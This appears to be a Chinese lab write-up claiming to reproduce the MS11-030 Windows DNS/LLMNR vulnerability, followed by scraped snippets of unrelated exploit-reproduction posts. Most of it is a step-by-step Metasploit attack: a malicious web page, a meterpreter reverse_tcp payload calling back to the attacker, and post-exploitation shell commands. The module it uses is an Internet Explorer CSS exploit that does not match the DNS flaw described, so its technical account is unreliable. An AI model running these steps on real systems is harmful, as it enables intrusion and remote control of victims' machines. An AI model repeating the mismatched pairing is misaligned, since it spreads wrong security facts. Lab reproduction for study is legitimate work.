MS11-030-DNS 解析漏洞复现
MS11-030:DNS 解析中的漏洞允许远程代码执行 (2509553)
安装的 Windows DNS 客户端处理链接-本地多播名称解析 (LLMNR) 查询的方法中存在一个缺陷,攻击者可利用此缺陷在 NetworkService 帐户的上下文中执行任意代码。
请注意,Windows XP 和 2003 不支持 LLMNR。要在这些平台上成功利用此漏洞,需要本地访问权限以及运行特殊应用程序的权限。但是,在 Windows Vista、2008、7 和 2008 R2 中,可以远程利用此漏洞。
Microsoft 已发布一系列用于 Windows XP、2003、Vista、2008、7 和 2008 R2 的修补程序。
复现准备
靶机:Win xp,2003,win7,and 2008R2
攻击机:kali
漏洞扫描
使用Nessus进行漏洞扫描,发现主机存在ms11-030漏洞
漏洞利用
启动msf
msfconsole
选择漏洞利用exp
use exploit/windows/browser/ms11_003_ie_css_import
查看配置参数
show options
设置生成的恶意网页的URL为baidu.com
为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080
设置LHOST以绑定本地IP
运行命令“exploit”或者“run”开始进行攻击,
生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页
设置攻击载荷
set payload windows/meterpreter/reverse_tcp
目标用户上线成功,回连攻击机
sessions 列出所有会话
sessions -i 1 进入1号会话
getuid 查看当前用户
shell 进入交换式cmd界面
chcp 65001 乱码编译
可以看到获取到IP地址
建议开启windows更新,开启防火墙。打上对应的补丁包
(同时可以利用MSF配合CS上线提权)
MS11-030-DNS 解析漏洞复现相关推荐
- nginx 上传文件漏洞_nginx解析漏洞复现
nginx解析漏洞复现 一.漏洞描述 该漏洞与nginx.php版本无关,属于用户配置不当造成的解析漏洞 二.漏洞原理 1. 由于nginx.conf的如下配置导致nginx把以'.php'结尾的文件 ...
- Apache多后缀解析漏洞复现(apache_parsing_vulnerability)
漏洞原理 apahe解析文件时候有一特性,Apache默认一个文件可以有多个以点分割的后缀,apache会从最右边开始识别其后缀名,如遇无法识别的后缀名则依次往左进行识别 如果运维人员给.php后缀的 ...
- 【linux】 apache多后缀文件解析漏洞复现
文章目录 一. 漏洞描述 二. 漏洞原理 三. 实验环境 1. apache版本 2. 在网站根目录我们建一个index.php,测试是否解析 3. 修改文件名测试 4. 用文件名不包含php的文件测 ...
- php目录遍历漏洞复现,nginx解析漏洞,配置不当,目录遍历漏洞环境搭建、漏洞复现...
nginx解析漏洞,配置不当,目录遍历漏洞复现 1.Ubuntu14.04安装nginx-php5-fpm 安装了nginx,需要安装以下依赖 sudo apt-get install libpcre ...
- IIS6.0目录解析漏洞原理/复现
目录解析漏洞原理 IIS6.0版本存在目录解析漏洞 , ,asp格式命名的文件夹,其目录下的所有文件都会被IIS当做asp文件来解析 漏洞复现 环境准备 Windows 2003系统 , IIS 6. ...
- IIS6.0文件解析漏洞原理/复现
IIS文件解析漏洞原理 IIS6.0存在文件解析漏洞 , 文件名中分号( ; )后面的内容不会被解析 比如 a.asp;jpg 文件 会被IIS解析成 a.asp 这个漏洞是逻辑上的问题,IIS6.0 ...
- 文件上传漏洞总结(含原因+防御措施)+白名单+黑名单+内容、头+解析漏洞/修补方案
文件上传漏洞简单总结+白名单+黑名单+内容.头+解析漏洞/修补方案 问题 什么是文件上传漏洞? 危害? 防御措施? 文件上传(验证/绕过)措施? 前端 js类绕过? 后端 黑名单绕过 特殊解析后缀 . ...
- Apache漏洞复现
目录 1.Apache多后缀解析漏洞复现(apache_parsing_vulnerability) 漏洞防御 2.Apache换行解析漏洞复现(CVE-2017-15715) 漏洞防御 3.CVE- ...
- nginx解析漏洞简单复现及修复
Nginx简介 Nginx是一款轻量级的web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,其特点是占内存小.并发能力强:国内使用Nginx的有百度.京东.新浪.网易.腾讯.淘宝等 ...
最新文章
- matlab7.0怎么用,matlab7.0中simulink使用
- postgres sql 多表联合查询_从零学会SQL-多表查询
- Ansible — Modules
- C++和MATLAB混合编程-DLL篇
- 电路常识性概念(2)-电容
- L2-5 集合相似度 (set的应用)
- POJ1011———Sticks
- Zurmo - - 国际化(翻译)
- nsis出错_nsis error,教您电脑总是提示nsis error怎么办
- mysql占用CPU超过100%
- 团!结就是力量!团!结就是力量!小鸟云拼团云主机【低至10元/月】
- [原]我和她同居的日子 一
- android平板值得买吗,最值得买大推荐 全新安卓平板你选谁?
- 区块链应用成功案例有哪些?
- Android获取当前位置(GPS和网络定位)
- Tyvj 1041 表达式计算2
- audacity VS2010 工程搭建
- wireshark抓包分析FTP
- buuctf刷题 3(1个sstl模板注入 1个session伪造 以及php)
- mysql update用法_mysql update语句的用法详解
热门文章
- python教程1009python教程_GitHub - gyl1009/codeparkshare: Python初学者(零基础学习Python、Python入门)书籍、视频、资料、社区推荐...
- 《奇点临近》的一些优秀读后感
- 【ICCV2019 reid】Self-training with progressive augmentation for unsupervised cross-domain person reid
- osgEarth2.10.2中关于空间参考系的一些理解
- 张艾迪(创始人):23岁天才的创业史
- ROS基础(四)——话题消息的定义与使用
- 2022.7.11~8.1纪中游记
- 一些关于dagger2的理解
- css字行高怎么设,css文本行高怎么设置-电脑自学网
- Java基础语法(汉罗塔)